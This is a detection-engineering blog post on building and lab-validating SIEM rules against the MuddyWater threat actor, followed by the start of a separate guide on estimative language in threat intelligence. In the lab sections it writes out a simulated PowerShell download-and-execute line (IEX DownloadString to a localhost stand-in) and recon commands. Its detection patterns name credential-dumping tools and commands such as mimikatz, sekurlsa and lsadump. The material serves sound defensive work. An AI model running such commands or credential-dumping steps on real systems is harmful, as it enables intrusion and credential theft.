T1033 coverage was added to Rule C via Win32_ComputerSystem during the analyst review pass — it was missing from the initial draft.Rule C matches the CISA-documented script closely enough to be treated as near-exact-match when observed.Required telemetry: Script Block Logging (Event ID 4104) — required for Rules A and C. Sysmon Event ID 1 for Rule B.# Rule A — Script Block captures SecurityCenter2 queryevent_type = script_block_log ANDscript_block_text MATCHES "SecurityCenter2" ANDscript_block_text MATCHES "AntiVirusProduct"# Rule B - Process command line contains SecurityCenter2 (fallback without SBL)event_type = process_create ANDimage ENDSWITH "powershell.exe" ANDcommand_line MATCHES "SecurityCenter2"# Rule C - Full survey pattern: all 5 ATT&CK techniques in one event# T1518.001 (AV enum) + T1016 (network config) + T1082 (OS info) + T1033 (username)event_type = script_block_log ANDscript_block_text MATCHES "SecurityCenter2" ANDscript_block_text MATCHES "Win32_NetworkAdapterConfiguration" ANDscript_block_text MATCHES "Win32_OperatingSystem" ANDscript_block_text MATCHES "(Win32_ComputerSystem|Win32_UserAccount|UserName)"Key false positives: AV management software and endpoint security platforms querying SecurityCenter2. IT inventory tools (Lansweeper, SCCM hardware inventory). Exclude by process hash or signer rather than by process name, since attackers can rename their scripts.det_mw_0010 — LSASS Memory Access and Credential Tool ExecutionTechniques: T1003.001, T1003.004, T1003.005 · Score: 5 (lab-validated)What it targets: MuddyWater performs credential access using three tools documented in CISA AA22–055A: Mimikatz and procdump64.exe against LSASS memory (T1003.001), and LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005).Why it’s built this way: Three independent rules cover the full credential dumping lifecycle, each with a different detection philosophy.Rule A is the design priority: a process accessing LSASS memory is the universal pre-condition for any LSASS dump, regardless of tool. Detecting the access event (Sysmon EID 10) rather than the tool name means Rule A fires on Mimikatz, procdump, custom C++ loaders, and any future variant — as long as the access mask is in the covered set. The access masks were sourced from established Mimikatz research (0x1010, 0x1410, 0x1438, 0x143a, 0x1418) and extended with 0x1fffff (PROCESS_ALL_ACCESS, used by custom dumpers) and 0x1f0fff (another all-access variant observed in the field). The exclusion list covers known legitimate callers — AV engines, CSrss, WinInit — without which this rule generates constant noise from endpoint security products.Rule B is the name-based backstop. Lower fidelity because it misses renamed tools, but catches actors using stock Mimikatz. The analyst review pass re-bracketed the command_line clause to keep it inside the event_type guard — a real operator precedence bug that would have caused the command-line check to match events outside the process_create filter.Rule C catches the dump artifact on disk — a final fallback when process-level events are unavailable. .dmp files in user-writable paths are anomalous outside of Windows Error Reporting, which writes to a fixed known path.Required telemetry: Sysmon Event ID 10 (ProcessAccess) with explicit lsass.exe targeting in the Sysmon configuration — this is not enabled by default. Without it, Rule A does not exist. Sysmon Event ID 1 for Rule B. Sysmon Event ID 11 for Rule C.# Rule A — LSASS process access (tool-agnostic, highest confidence)event_type = process_access ANDtarget_image ENDSWITH "lsass.exe" ANDgranted_access MATCHES "(0x1010|0x1410|0x1438|0x143a|0x1418|0x1fffff|0x1f0fff)" ANDsource_image NOT IN ["MsMpEng.exe","csrss.exe","wininit.exe","svchost.exe", "SecurityHealthService.exe","CylanceSvc.exe","SentinelAgent.exe"]# Rule B - Known credential tool execution (name-based backstop)# command_line clause is bracketed inside event_type guard (bug fix in review)event_type = process_create AND(image IMATCHES "mimikatz\.exe" OR image ENDSWITH "procdump64.exe" OR image IMATCHES "lazagne\.exe" OR command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)")# Rule C - Dump file creation in user-writable path (artifact backstop)event_type = file_create ANDfile_extension = "dmp" ANDfile_path MATCHES "(\\AppData\\|\\Temp\\|\\Users\\|\\ProgramData\\)"Key false positives: AV and EDR agents that legitimately access LSASS — exclude by process hash, not name, since names are spoofable. Windows Error Reporting creating .dmp files in %TEMP%\WER — exclude that specific path in Rule C. Legitimate procdump usage by developers for application crash diagnostics — require a separate approved-tools baseline.Important environment note: Credential Guard and PPL (Protected Process Light) prevent LSASS reads on modern, hardened systems. If your environment has these enabled, LSASS dump detection is still valuable as a canary for misconfigured or unpatched endpoints, but confirm protection status before using coverage scores here as a measure of actual protection.Phase 5: Validation LabArchitectureDeploy in One Commandgit clone https://github.com/anpa1200/operation-desert-hydra.gitcd operation-desert-hydracp stack/.env.template stack/.env # fill in passwordsbash start.shstart.sh creates the Docker network, starts all stack services, waits for Elasticsearch, boots the Windows 10 Vagrant VM, provisions it via Ansible (Sysmon + Script Block Logging + Winlogbeat), and runs all 11 simulations.Simulation DesignEvery simulation is benign-by-design:No live malware, no real C2, no credential exfiltrationSimulations write benign files (VBScript with Write-Host payload), run real Windows binaries with harmless arguments, or use .NET to open process handles with minimal access masksAll .dmp files are deleted immediately after event confirmationThe VM does not connect to real Telegram infrastructureThe Ansible playbook (lab/ansible/playbooks/validate.yml) runs each simulation, waits 3 seconds, queries the Windows Event Log with Get-WinEvent -FilterHashtable (time-bounded to the last 60 seconds), and prints PASS / FAIL.Step 21: det_mw_0001 — Spearphishing Delivery ChainWhat MuddyWater does: Delivers a ZIP or Office file via email or Egnyte/OneDrive link. The attachment contains a VBScript or WSF file that spawns a hidden encoded PowerShell loader (PowGoop/POWERSTATS).Simulation: wscript.exe sim_delivery.vbs → powershell.exe -WindowStyle Hidden -NonInteractive -EncodedCommand KQL proof query:winlog.event_id: 1AND winlog.event_data.ParentImage: *wscript.exe*AND winlog.event_data.Image: *powershell.exe*AND winlog.event_data.CommandLine: *EncodedCommand*Result: PASS — Sysmon EID 1 captured wscript.exe → powershell.exe -EncodedCommand. Parent-child chain and Base64 command line both visible in Kibana.Step 22: det_mw_0002 — Web Service Shell SpawnWhat MuddyWater does: Exploits Exchange (CVE-2020–0688), IIS, or Log4j (CVE-2021–44228) — web-facing service spawns cmd.exe or powershell.exe for post-exploitation recon.Simulation: wscript.exe sim_exploit.vbs → cmd.exe /c whoami & hostname & ipconfig /allKQL proof query:winlog.event_id: 1AND winlog.event_data.ParentImage: *wscript.exe*AND winlog.event_data.Image: *cmd.exe*AND winlog.event_data.CommandLine: (*whoami* OR *hostname* OR *ipconfig*)Result: PASS — Sysmon EID 1 captured wscript.exe → cmd.exe with recon commands in CommandLine.Step 23: det_mw_0003 — PowerShell Encoded CommandWhat MuddyWater does: PowGoop uses -EncodedCommand for C2 setup. POWERSTATS uses IEX + (New-Object Net.WebClient).DownloadString(...) for stager execution.Rule A simulation: powershell.exe -NonInteractive -e KQL — Rule A:winlog.event_id: 1AND winlog.event_data.CommandLine: *-e*AND winlog.event_data.CommandLine: *[A-Za-z0-9+/]{40,}*Rule A Result: PASS — 4 events captured. PowerShell with Base64 blob visible in command line.Rule B simulation: IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/...'))KQL — Rule B:winlog.event_id: 4104AND winlog.event_data.ScriptBlockText: *IEX*AND winlog.event_data.ScriptBlockText: *DownloadString*Rule B Result: PASS — 16 EID 4104 events. Script Block Logging decoded the IEX + DownloadString pattern.Capability gate: Script Block Logging (EID 4104) must be explicitly enabled. Without it, Rule B is unavailable and detection degrades to command-line heuristics only.Step 24: det_mw_0004 — DLL Side-LoadingWhat MuddyWater does: PowGoop drops Goopdate.dll alongside a copy of GoogleUpdate.exe outside the legitimate Google installation path. When GoogleUpdate launches, Windows loads the malicious DLL.Simulation: Copy a benign 4-byte MZ stub as goopdate.dll into a test directory alongside a signed binary. Launch the binary.Result: PARTIAL — Sysmon EID 7 (ImageLoad) did not fire. Root cause: a 4-byte MZ stub is not a valid loadable DLL — the Windows loader rejects it before generating an EID 7 event. The Sysmon config and detection rule are correct. Resolution: Re-test with a real GoogleUpdate.exe (requires Google Chrome installed on lab VM).Step 25: det_mw_0005 — Registry Run Key PersistenceWhat MuddyWater does: Small Sieve writes OutlookMicrosift to HKCU\...\CurrentVersion\Run — a deliberate typo designed to look like a Microsoft entry. Canopy drops a .wsf file to the Startup folder.Rule A simulation: Write OutlookMicrosift = notepad.exe to HKCU\...\RunKQL — Rule A:winlog.event_id: 13AND winlog.event_data.TargetObject: *CurrentVersion\Run\OutlookMicrosift*Rule A Result: PASS — 3 Sysmon EID 13 events. OutlookMicrosift Run key captured.Rule C simulation: Copy a benign .wsf file to %APPDATA%\...\Start Menu\Programs\Startup\KQL — Rule C:winlog.event_id: 11AND winlog.event_data.TargetFilename: *\Startup\*AND winlog.event_data.TargetFilename: *.wsf*Rule C Result: PASS — 3 Sysmon EID 11 events. WSF file creation in Startup folder captured.Step 26: det_mw_0006 — Scheduled Task (43-Minute Beacon)What MuddyWater does: BugSleep creates a scheduled task triggered every 43 minutes. This interval is a BugSleep artifact — not a default, not a round number. It appears in INCD 2024 reporting and is one of the most precise technical IoCs in the dataset.Simulation: schtasks.exe /create /tn DH-SIM-0006-TestTask /tr notepad.exe /sc MINUTE /mo 43 /fKQL:winlog.event_id: 1AND winlog.event_data.Image: *\schtasks.exe*AND winlog.event_data.CommandLine: */mo 43*Result: PASS — 3 Sysmon EID 1 events. schtasks.exe /mo 43 captured. The 43-minute interval in the command line is the exact BugSleep artifact.Hunt value: PT43M in Task Scheduler Operational logs is a retroactive hunt trigger. One match = investigate immediately. No legitimate software uses this exact interval.Step 27: det_mw_0007 — RMM Tool AbuseWhat MuddyWater does: Delivers a legitimate RMM binary (ScreenConnect, SimpleHelp, AteraAgent, Level, PDQConnect) via phishing email or file-sharing link. The binary is placed in AppData, Temp, or Downloads — not installed by an IT management system. This is documented in all five government source tiers.Simulation: Copy ScreenConnect.ClientService.exe to C:\Temp\dh-lab\ and launch it.KQL:winlog.event_id: 1AND winlog.event_data.Image: *\Temp\ScreenConnect*Result: PASS — 6 Sysmon EID 1 events. RMM binary executing from \Temp\ captured.Production requirement: This detection requires a baseline of authorized RMM deployments per endpoint. Without the baseline, it generates noise. With it, any out-of-baseline RMM execution is an immediate high-confidence alert.Step 28: det_mw_0008a — Telegram Bot API C2What MuddyWater does: Small Sieve uses the Telegram Bot API (api.telegram.org:443) for C2 over HTTPS. In an enterprise environment where Telegram is not standard software, any non-browser process connecting to this domain is anomalous.Simulation: powershell.exe makes an HTTP request to https://api.telegram.org/botTEST/getMe (invalid token — 401 response; the connection attempt is the evidence).Result: FAIL — Sysmon EID 3 (NetworkConnect) did not fire. Root cause: VirtualBox NAT prevents Sysmon from capturing the outbound network connection to api.telegram.org in the lab environment. The Sysmon rule config is correct. Resolution: Re-test with a host-only NIC that provides direct internet access.Step 29: det_mw_0008b — DNS TunnelingWhat MuddyWater does: Mori uses DNS tunneling for C2. High-volume queries with long, high-entropy subdomain labels are the telemetry signature.Simulation: 60 Resolve-DnsName queries with 42-character random labels against *.test.internal.KQL:winlog.event_id: 22AND winlog.event_data.QueryName: *.test.internal*Result: PASS — 180 Sysmon EID 22 events captured. 42-character random labels visible in QueryName field. Volume threshold (Rule A) and label-length threshold (Rule B) would both trigger in a production deployment.Step 30: det_mw_0009 — WMI SecurityCenter2 DiscoveryWhat MuddyWater does: CISA AA22–055A documents a post-access survey script that queries root\SecurityCenter2\AntiVirusProduct via WMI — enumerating the installed AV product before deciding how to proceed. This is also combined with OS info, network config, and user queries in a single script.Simulation (Rule A): Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProductKQL — Rule A:winlog.event_id: 4104AND winlog.event_data.ScriptBlockText: *SecurityCenter2*Rule A Result: PASS — 21 PS EID 4104 events. SecurityCenter2 visible in decoded ScriptBlockText.Detection value: SecurityCenter2 + AntiVirusProduct is one of the highest-specificity behavioral signals in this dataset. Its legitimate caller population is tiny: only AV management consoles and a few inventory tools query this namespace. A PowerShell process making this query outside those exceptions warrants immediate investigation.Step 31: det_mw_0010 — LSASS Memory AccessWhat MuddyWater does: Uses Mimikatz, procdump64.exe, and LaZagne to dump LSASS memory and extract credentials. CISA AA22–055A names all three tools.Rule A simulation: .NET OpenProcess(PROCESS_QUERY_INFORMATION, lsass.pid) — opens a handle to lsass.exe with a minimal access mask, triggering Sysmon EID 10.KQL — Rule A:winlog.event_id: 10AND winlog.event_data.TargetImage: *lsass.exe*AND winlog.event_data.GrantedAccess: 0x1400Rule A Result: PASS — 3,398 Sysmon EID 10 events with GrantedAccess: 0x1400 and TargetImage: lsass.exe. The high event count is expected — LSASS receives many legitimate handle requests from AV, EDR, and Windows system processes. Production deployment requires an allowlist of known-good callers.Rule C simulation: Write a 4-byte MDMP header as lsass_test.dmp to C:\Temp\dh-lab\ — triggers Sysmon EID 11.KQL — Rule C:winlog.event_id: 11AND winlog.event_data.TargetFilename: *.dmp*AND winlog.event_data.TargetFilename: *Temp*Rule C Result: PASS — 6 Sysmon EID 11 events. C:\Temp\dh-lab\lsass_test.dmp creation captured.Lab safety: The .dmp file was deleted immediately after event confirmation. No credential material exists in the file — it was a 4-byte header stub. No real LSASS dump was performed.Phase 5 Validation Results SummaryFull run: ansible-playbook playbooks/validate.yml — ok=70 changed=42 failed=0Step 21 — det_mw_0001 · Process spawn → PASSStep 22 — det_mw_0002 · Shell from service → PASSStep 23 — det_mw_0003 · Rule A (-e + Base64) → PASSStep 23 — det_mw_0003 · Rule B (IEX + DownloadString) → PASSStep 24 — det_mw_0004 · EID 7 ImageLoad → PARTIALStep 25 — det_mw_0005 · Rule A (OutlookMicrosift) → PASSStep 25 — det_mw_0005 · Rule C (WSF in Startup) → PASSStep 26 — det_mw_0006 · schtasks /mo 43 → PASSStep 27 — det_mw_0007 · Rule A (RMM from \Temp) → PASSStep 27 — det_mw_0007 · Rule B (RMM from PS parent) → PASSStep 28 — det_mw_0008a · EID 3 Telegram → FAILStep 29 — det_mw_0008b · EID 22 DNS tunneling → PASSStep 30 — det_mw_0009 · Rule A (SecurityCenter2 EID 4104) → PASSStep 30 — det_mw_0009 · Rule B (wmic SecurityCenter2) → PASSStep 31 — det_mw_0010 · Rule A (LSASS EID 10) → PASSStep 31 — det_mw_0010 · Rule C (.dmp EID 11) → PASS13 PASS / 1 PARTIAL / 1 FAIL across 16 rule checks.Phase 6: Coverage MatrixOf 22 ATT&CK techniques documented in the source set:15 techniques (68%) — score 5, fully lab-validated2 techniques (9%) — score 4, correlated and validated via fallback4 techniques (18%) — score 3, rule present but validation incomplete7 techniques — score 0, no detection (Lateral Movement, Collection, Exfiltration, Impact)The six capability gates that determine your effective coverage floor:PowerShell Script Block Logging (EID 4104) — unlocks det_mw_0003 Rule B and det_mw_0009 Rules A/C. Without it: detection degrades to command-line heuristics only.Sysmon EID 10 (ProcessAccess) — unlocks det_mw_0010 Rule A (tool-agnostic LSASS access). Without it: falls back to binary name matching, misses custom dumpers.Sysmon EID 7 (ImageLoad) — unlocks det_mw_0004 (DLL side-loading). Without it: DLL loads are completely invisible.DNS resolver logging (full QNAME) — unlocks det_mw_0008b (DNS tunneling). Without it: Mori C2 channel is invisible.Network flow / proxy logs — unlocks det_mw_0007 Rule C and det_mw_0008a. Without it: RMM and Telegram C2 network-layer coverage lost.Email gateway telemetry (SEG) — unlocks det_mw_0001 full correlated logic. Without it: email-to-endpoint correlation unavailable.What Defenders Should Do Right Now1. Baseline your RMM deployments. det_mw_0007 is the most consistently documented MuddyWater technique across all five source tiers. It fires on ScreenConnect, SimpleHelp, AteraAgent, Level, and PDQConnect from non-standard paths. But it needs a baseline of authorized deployments first. Build the baseline; the detection logic is already written.2. Enable PowerShell Script Block Logging fleet-wide. One Group Policy change:Computer Configuration → Administrative Templates → Windows Components→ Windows PowerShell → Turn on PowerShell Script Block Logging → EnabledThis unlocks det_mw_0003 Rule B and all three det_mw_0009 rules. No other change required.3. Configure Sysmon ProcessAccess against lsass.exe. Without it, LSASS credential dumping detection is binary-name-only. Renamed Mimikatz and custom C++ dumpers are invisible. Add targeting lsass.exe to sysmon.xml.4. Hunt for PT43M now. Query your Task Scheduler Operational logs for any task with a RepetitionInterval of PT43M. If you find one you didn't create, that is BugSleep. No other legitimate software uses this interval.Reproduce It YourselfThe entire project is on GitHub: github.com/anpa1200/operation-desert-hydraOne repository contains everything: Docker Compose stack (OpenCTI + Elasticsearch + Kibana), Vagrant lab VM, Ansible provisioning playbooks, detection rules in four formats (Sigma, KQL, Elastic JSON, SPL), structured intelligence datasets (YAML), and all 12 proof screenshots.Deploy:git clone https://github.com/anpa1200/operation-desert-hydra.gitcd operation-desert-hydracp stack/.env.template stack/.env# fill in ELASTIC_PASSWORD, OPENCTI_ADMIN_PASSWORD, OPENCTI_ADMIN_TOKENbash start.sh# → OpenCTI: http://localhost:8080# → Kibana: http://localhost:5601# → all 11 simulations run automatically (~10 min)Stop / destroy:bash stop.sh # halt VM, keep stack and databash stop.sh --destroy-vm # remove VM diskbash stop.sh --destroy-stack # also stop Docker stackSkip the lab VM (OpenCTI + Kibana only, no Windows VM):bash start.sh --skip-labPrerequisites: Docker, VirtualBox, Vagrant, Ansible, Python 3 + pywinrm. Full details in the README.Key files:docs/article-step-0-project-scenario.md — full phase-by-phase walkthroughdata/detections.yaml — all 11 detection records with coverage scoreslab/ansible/playbooks/validate.yml — the 11 simulation playbookdetections/sigma/, detections/kql/, detections/elastic/, detections/spl/ — rule exportsWhat This Project Is NotThis is not a red team toolkit. The lab produces benign telemetry for detection validation — no live malware, no real C2, no credential theft. The detection pseudologic is SIEM-agnostic and requires production translation and tuning before deployment. Coverage scores are conservative: 5 requires a Kibana screenshot, not just passing logic.The source base is entirely public. The actor’s actual TTPs may be more sophisticated than what is documented. Treat the coverage matrix as a floor, not a ceiling.Production ScarsEverything above describes what the project looks like after it worked. This section documents what broke, in what order, and what was actually fixed — the kind of detail that gets cut from writeups but is the most useful part for anyone trying to reproduce this.Scar 1: The Simulations Were Faking ItThe first validation attempt used synthetic event markers. The simulation playbook injected a DH-SIM-0001 string into the CommandLine field, then the Kibana queries looked for that exact string:winlog.event_id: 1 AND winlog.event_data.CommandLine: *DH-SIM-0001*This produces a screenshot. It does not prove a detection works.The problem is fundamental: a query that looks for a marker you injected proves that injection works, not that a detection fires on real attacker behavior. If MuddyWater runs wscript.exe and spawns powershell.exe -EncodedCommand, the DH-SIM-0001 query returns nothing. The detection coverage number was meaningless.What was fixed: All simulations were rewritten to produce realistic execution chains — wscript.exe spawning powershell.exe -EncodedCommand , schtasks.exe /create /sc minute /mo 43, lsass.exe being accessed by a test process with the correct GrantedAccess mask. All KQL queries were rewritten to use real field-based conditions: winlog.event_data.ParentImage, winlog.event_data.GrantedAccess, winlog.event_data.TargetObject, winlog.event_data.ScriptBlockText. Every proof screenshot now shows a real field value, not a synthetic marker.The lesson: A proof screenshot is only as good as the conditions that trigger it. If the simulation writes what the query reads, you have a tautology, not a detection.Scar 2: det_mw_0004 — The DLL That Wouldn’t LoadThe simulation for det_mw_0004 (DLL side-loading) created a 4-byte MZ-header stub file named Goopdate.dll in a temp directory alongside GoogleUpdate.exe, then waited for Sysmon Event ID 7 (ImageLoad) to fire.It never fired.Root cause: a 4-byte MZ stub is not a valid PE binary. The Windows loader parses the PE header before loading — the stub fails the loader’s structural validation and is rejected before the load event is generated. Sysmon only generates EID 7 for DLLs that actually get mapped into process memory. A file that fails to load produces no EID 7.The Sysmon configuration was correct. The detection rule was correct. The simulation was wrong.Result: PARTIAL — coverage score 3 instead of 5.What it would take to fix: The test needs a real, valid DLL — even an empty DLL compiled from a single DllMain that returns TRUE. Alternatively, installing the actual Google Chrome on the lab VM provides a real Goopdate.dll at the expected path, which could then be copied to a non-standard location. Neither was done in this iteration due to lab scope constraints (no internet access on the VM for Chrome installation, no compiler toolchain in the lab).The lesson: When validating EID 7 detections, your test artifact must be a valid loadable PE. A stub file saves time and produces nothing.Scar 3: det_mw_0008a — VirtualBox NAT Ate the Telegram TrafficThe simulation for det_mw_0008a (Telegram Bot API C2) made an outbound HTTPS connection to api.telegram.org from PowerShell and waited for Sysmon Event ID 3 (NetworkConnect) to fire.It never fired.Root cause: VirtualBox NAT performs network address translation at the hypervisor level. Sysmon captures network connections at the Windows kernel level. With NAT, the connection from the VM’s perspective terminates at the NAT gateway (10.0.2.2), not at api.telegram.org. Sysmon sees a connection to 10.0.2.2:443, not api.telegram.org:443. The detection rule looking for api.telegram.org as the destination found nothing.There was an additional layer: VirtualBox NAT does not forward arbitrary outbound HTTPS traffic by default in this lab configuration — the VM had no direct internet path, only access to the host’s 10.0.2.2 gateway. Even fixing the Sysmon observation problem would require a working internet path from the VM.Result: FAIL — coverage score 3 instead of 5.What it would take to fix: Add a host-only or bridged network adapter to the VM that provides direct internet access, and confirm Sysmon captures the connection with the external destination. Alternatively, run a local HTTPS server on the host at api.telegram.org via a hosts file override, which would make the destination resolvable within the lab and catchable by Sysmon.The lesson: VirtualBox NAT is the right choice for lab isolation (the VM cannot reach the internet accidentally), but it is the wrong choice if you need to validate detections based on external destination hostnames. Design the network topology before writing detection validation cases.Scar 4: Kibana Showed Nothing — Wrong Time WindowAfter running the SecurityCenter2 WMI discovery simulation (Step 30), the Kibana query returned zero results.The query was correct. The simulation had run correctly. The events were in Elasticsearch.Root cause: Kibana’s default time window was set to “Last 15 minutes.” The simulation had run in a previous lab session, and Winlogbeat had shipped the events to Elasticsearch during that session. The events existed — they were just outside the current time window.What was fixed: Changed the time filter to “Last 24 hours.” Events appeared immediately.The lesson: When a Kibana proof shows no results, the first diagnostic step is the time filter, not the query. This is obvious in retrospect and a consistent source of false “detection failed” conclusions during initial validation runs.Scar 5: Detection Design Bugs Found in Review (Before Validation)Before running any simulations, every detection record went through a structured review pass. Four real bugs were found:det_mw_0010 Rule B — Operator precedence error. The original pseudologic was:event_type = process_create ANDimage IMATCHES "mimikatz\.exe" ORimage ENDSWITH "procdump64.exe" ORcommand_line IMATCHES "(sekurlsa|lsadump|privilege::debug)"Without explicit parentheses, OR has lower precedence than AND in most query languages. The command_line IMATCHES clause was evaluated independently of the event_type guard, meaning the rule would fire on any event (not just process_create) where the command line contained sekurlsa. In a SIEM with millions of events per day, this generates noise and potentially masks the real signal. The fix added explicit brackets to keep all OR branches inside the event_type = process_create guard.det_mw_0009 Rule C — T1033 was not covered. The initial Rule C matched SecurityCenter2, Win32_NetworkAdapterConfiguration, and Win32_OperatingSystem — covering T1518.001, T1016, and T1082. The documented CISA script also collects the username via Win32_ComputerSystem. T1033 (System Owner/User Discovery) was missing. Fixed by adding Win32_ComputerSystem|Win32_UserAccount|UserName to the pattern match.det_mw_0004 Rule A — Missing x86 Google path. The initial allowlist only contained the x64 path C:\Program Files\Google\. On 64-bit Windows, the 32-bit Google Update installs to C:\Program Files (x86)\Google\. Without the x86 path in the allowlist, any Goopdate.dll load from the legitimate 32-bit Google installation would fire the detection. Added both paths.det_mw_0010 Rule A — Access mask set too narrow. The initial mask set covered standard Mimikatz masks (0x1010, 0x1410, 0x1438) but missed 0x1fffff (PROCESS_ALL_ACCESS, used by custom C++ dumpers and some loaders) and 0x1f0fff (another all-access variant observed in field reporting). A detection that only catches stock Mimikatz masks is bypassed by any custom implementation. Extended the mask set to cover known custom-dumper variants.The lesson: Writing pseudologic in a YAML field with no syntax validation means operator precedence bugs survive until someone reads the logic carefully. Structured peer review — ideally by someone who will try to break the rule — catches these before they hit production.Scar 6: The OpenCTI Stack Was in a Different RepositoryThe original project structure had the OpenCTI Docker Compose stack in a separate repository (opencti-intelligent-shield) that was not included in the desert-hydra repo. The start.sh script referenced the external repo with a hardcoded path. Cloning operation-desert-hydra and running start.sh failed immediately on any machine other than the development machine.What was fixed: The entire stack — docker-compose.yml, docker-compose.kibana.yml, and .env.template — was copied into stack/ inside the desert-hydra repo. All path references were updated. The repo is now fully self-contained: git clone + cp .env.template .env + bash start.sh works from a clean machine with no external dependencies beyond Docker, Vagrant, VirtualBox, Ansible, and pywinrm.The lesson: A reproducibility claim requires everything needed to reproduce to be in the same repository. External path dependencies are invisible during development and obvious on first external clone.Scar 7: MITRE Connector TimingThe import script (tools/opencti_import.py) creates MuddyWater → uses → ATT&CK technique relationships by looking up techniques that the MITRE ATT&CK connector has synced into OpenCTI. The connector takes several minutes to complete its initial sync of 846 techniques.If the import script runs before the connector finishes, the technique lookup returns nothing — the techniques don’t exist yet. The original script failed silently on these lookups and skipped the relationship creation.What was fixed: The script was updated with find_or_create_attack_pattern(): if a technique is not yet in OpenCTI, create a stub AttackPattern object with the correct x_mitre_id. When the MITRE connector eventually syncs that technique, OpenCTI's deduplication logic merges the stub with the connector's fully populated object. All relationships that were created against the stub are preserved and now point to the enriched object. Running the script a second time after the connector finishes confirms existing objects rather than creating duplicates.The lesson: Any script that creates relationships against objects populated by a connector needs to handle the case where the connector has not finished. Fail loudly or create stubs — don’t skip silently.Surviving GapsTwo failures from Phase 5 remain open:det_mw_0004 — DLL side-loading detection (EID 7) is not lab-validated. The detection rule is sound; the simulation needs a valid PE DLL. Coverage score stays at 3 until the lab is extended with a compiled test DLL.det_mw_0008a — Telegram Bot API connection detection (EID 3) is not lab-validated. The detection rule is sound; the lab network topology prevents capturing external destination hostnames via NAT. Coverage score stays at 3 until the VM has a direct internet path or a local HTTPS proxy target.These are documented as open items, not dismissed as “out of scope.” The coverage score scale is designed to reflect this: a score of 3 means “behavioral detection, no lab proof” — it is honest about the gap rather than claiming coverage that was not validated.Seven ATT&CK techniques have zero detection coverage. Lateral movement (T1021.001 RDP, T1550.002 Pass the Hash), Collection (T1005, T1039), Exfiltration (T1041), and Impact (T1486 ransomware, T1490 shadow copy deletion from DarkBit). These are acknowledged in the coverage matrix, not hidden. The actor uses them. The public source base documents them. The detection coverage does not exist in this iteration.All code, data, and proof screenshots are version-controlled at github.com/anpa1200/operation-desert-hydraFollow My WorkI publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.Portfolio / Knowledge Base: https://anpa1200.github.io/Medium: https://medium.com/@1200kmGitHub: https://github.com/anpa1200LinkedIn: https://www.linkedin.com/in/andrey-pautov/Andrey PautovOperation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Applying Sherman Kent’s Analytic Discipline to CTI: A Practical Analyst Guide

Mon, 08 Jun 2026 06:31:26 +0200

Estimative language, evidence discipline, and analytic integrity for cyber threat intelligenceExecutive SummaryThis is an analyst guide, not a formal CTI report. It does not answer a single priority intelligence requirement, assess one actor or campaign end to end, provide an IOC package, or produce a defensive detection plan. Its purpose is narrower: show how cyber threat intelligence analysts can apply Sherman Kent-style analytic discipline to public evidence without overstating what the evidence proves.Sherman Kent was one of the central figures in professionalizing U.S. intelligence analysis. His writing emphasized clear estimative language, policy relevance, analytic independence, evidence discipline, explicit uncertainty, and the separation of fact from judgment (CIA, Words of Estimative Probability; CIA, The Intelligence Process: A Digest from Strategic Intelligence; CIA, Sherman Kent and the Profession of Intelligence Analysis).This article uses “Kent-style analytic discipline” as shorthand for that professional tradition. It is not claiming that there is one official, codified “Sherman Kent doctrine” that directly governs modern CTI. The safer claim is that Kent’s principles are consistent with later Intelligence Community analytic standards and structured analytic technique guidance, including ICD 203 and the CIA tradecraft primer (ODNI, ICD 203; CIA, A Tradecraft Primer).For CTI, this matters because analysts often work from incomplete telemetry, vendor reporting, malware analysis, infrastructure links, victimology, and government attribution statements. Those evidence types do not all prove the same thing. A file hash can support a malware-family claim. A command-and-control pattern can support a campaign link. Victimology can support a targeting assessment. None of those, by itself, proves adversary intent or state tasking.This guide therefore focuses on one standard: make the reader see where evidence ends and assessment begins.Table of ContentsEvidence and Confidence Model Used HereEstimative Probability ReferenceWhat Is Sherman Kent-Style Analytic Discipline?What Maps From Traditional Intelligence to CTI — And What Does Not1. Policy Relevance Without Policy Capture2. Facts, Assumptions, and Judgments3. Estimative Probability Language4. Confidence Is Not Probability5. Alternative Hypotheses6. Warning, Indicators, and Collection Gaps7. Analytic Integrity in CTICognitive Biases CTI Analysts Should NameWhere ATT&CK and the Pyramid of Pain FitKent-Style ChecklistPractical Analyst TemplateConclusionReferencesEvidence and Confidence Model Used HereThis article uses these evidence labels:Author-observed: directly inspected by the author. This article rarely uses this label because it is based on public reporting, not original telemetry or reverse engineering.Source-observed: the cited source claims direct access to evidence, such as imagery, telemetry, malware samples, incident response data, or official records.Reported: stated by a cited source, but not independently verified here.Assessed: analytic judgment made by a cited source.Inferred: reasonable interpretation made in this article from public evidence, but not directly observed.Qualifiers are tracked separately from evidence labels:Qualifier / limitation: ambiguity, scope limit, alternate explanation, source-access constraint, or reason the evidence should not be overinterpreted.Confidence attaches to a specific assessment, not to an example as a whole:High confidence: strong source access, strong credibility, meaningful corroboration, and a short inference chain.Moderate confidence: credible reporting, but incomplete visibility, limited corroboration, contested interpretation, or a longer inference chain.Low confidence: plausible inference from thin, indirect, or weakly corroborated evidence.Every example uses the same four-field confidence basis:Source access: direct telemetry, reverse engineering, official record, government statement, vendor incident response, or secondary reporting.Source reliability: established, unknown, contested, or mixed.Information credibility: corroborated, single-source, inferred, or disputed.Author verification: verified, partially verified, or not independently verified here.This is still not a formal source-grading model. Operational CTI should use a more rigorous source reliability and information credibility system, especially when reporting will support security operations, legal action, executive decision-making, or public attribution.Estimative Probability ReferenceKent argued that estimative words should not be left to normal conversational ambiguity. Different organizations use different probability bands, but a CTI team should publish and reuse one internal lexicon. A simple working version is:Probability is not confidence. “Likely” says how probable the judgment is. “Moderate confidence” says how strong the evidentiary basis is.These bands are illustrative, not universal; the important control is consistency inside the publishing team.What Is Sherman Kent-Style Analytic Discipline?Kent-style analytic discipline can be reduced to a practical standard: intelligence analysis should help decision-makers reason under uncertainty without hiding the uncertainty. The analyst’s job is not to sound certain. The analyst’s job is to make evidence, assumptions, probability, confidence, alternatives, and collection gaps visible enough that decision-makers understand the basis and limits of the judgment.In practice, that means:Serve the decision, not the preference: Intelligence should be relevant to policy or defensive decisions, but analytic judgment should not be shaped to support a preferred outcome.Separate facts from estimates: The analyst should distinguish observed evidence from assumptions, inference, and 